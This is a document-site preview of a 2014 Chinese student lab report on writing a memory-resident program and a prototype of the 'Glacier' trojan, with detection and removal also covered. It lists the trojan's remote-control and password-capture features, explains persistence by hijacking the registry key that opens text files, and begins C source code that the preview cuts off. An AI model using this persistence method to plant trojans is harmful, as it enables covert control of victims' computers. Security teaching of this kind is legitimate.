网络安全技术实验二_程序内存驻留与木马原型

网络安全技术实验二_程序内存驻留与木马原型

ID:13896375

大小:309.00 KB

页数:10页

时间:2018-07-24

网络安全技术实验二_程序内存驻留与木马原型_第1页
网络安全技术实验二_程序内存驻留与木马原型_第2页
网络安全技术实验二_程序内存驻留与木马原型_第3页
网络安全技术实验二_程序内存驻留与木马原型_第4页
网络安全技术实验二_程序内存驻留与木马原型_第5页
资源描述:

《网络安全技术实验二_程序内存驻留与木马原型》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、沈阳工程学院学生实验报告实验室名称:信息学院网络安全实验室实验课程名称:网络安全技术实验项目名称:实验二程序内存驻留与木马原型班级:姓名:学号:实验日期:2014年3月21日实验台编号:34指导教师:批阅教师(签字):成绩:一.实验目的理解内存驻留程序,编写程序实现内存驻留;理解“冰河”原型木马,编写程序实现简单的木马。二.实验内容编程实现:“冰河”原型;编程判断是否中了“冰河”原型木马,并能查杀木马。三.实验原理“冰河“木马开发于1999年,在设计之初,开发者的本意是编写一个功能强大的远程控制软件。但一经推出

2、,就依靠其强大的功能成为了黑客们发动入侵的工具,并结束了国外木马一统天下的局面,成为国产木马的标志和代名词。在2006年之前,冰河在国内一直是不可动摇的领军木马,在国内没用过冰河的人等于没用过木马,由此可见冰河木马在国内的影响力之巨大。1)自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用);2)记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息;3)获取系统信息:包括计算机名

3、、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据;4)限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制;5)远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式)等多项文件操作功能;6)注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能;7)发送信息:以四种常用图标向被控端发送简短信

4、息;8)点对点通讯:以聊天室形式同被控端进行在线交谈。从一定程度上可以说冰河是最有名的木马了,就连刚接触电脑的用户也听说过它。虽然许多杀毒软件可以查杀它,但国内仍有几十万中冰河的电脑存在!作为木马,冰河创造了最多人使用、最多人中弹的奇迹!四.实验软硬件环境虚拟机中windows2000环境。五.实验步骤第一步:“冰河”木马的文本文件关联采用“冰河”将自己与文本文件的打开方式相关联的方法实现植入“冰河”。关联的方法就是使用注册表“HKEY_CLASSES_ROOT”主键下的“txtfileshellopen

5、command”键。程序要实现的功能是:当用户双击打开一个文本文件,先启动要驻留的程序,然后再启动记事本打开这个文本文件。这包括两方面内容,一是编程修改注册表,二是编程实现程序自动驻留。运行本程序前,请先确定系统是否中了“冰河”。有查看注册表内容和程序两种判断方式。分别如图1和图2所示。图1通过注册表判断未中“冰河”图2通过程序判断未中“冰河”【程序源代码】  #include  #include  //结构WNDCLASS包含一个窗口类的全部信息  WNDCLASSwc

6、;  HWNDh_wnd;  MSGmsg;  //冰河木马修改注册表函数IceRiverEditReg声明  boolIceRiverEditReg(void);  //消息处理函数wndProc的声明  longWINAPIWindowProc(HWND,UINT,WPARAM,LPARAM);  //winMain函数的功能是被系统调用,作为一个32位应用程序的入口点。  intPASCALWinMain(HINSTANCEh_CurInstance,  HINSTANCEh_PrevInstance,L

7、PSTRp_CmdLine,intm_Show)  {  //修改注册表  boolbRegEditFlag=IceRiverEditReg();  //以下被注释的代码为判定注册表是否修改成功  /*if(bRegEditFlag==true)  MessageBox(NULL,"注册表修改成功!","",MB_OK);*/  //bSsuccess用于保存CreateProcess函数返回值  BOOLbSuccess;  //PROCESS_INFORMATION结构返回有关新进程及其主线程的信息。  P

8、ROCESS_INFORMATIONpiProcInfo;  //STARTUPINFO结构用于指定新进程的主窗口特性。  STARTUPINFOInfo;  //以下为Info的相关成员,详见MSDN  Info.cb=sizeof(STARTUPINFO);  Info.lpReserved=NULL;  Info.lpDesktop=NULL;  Info.lpTitle=NUL

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。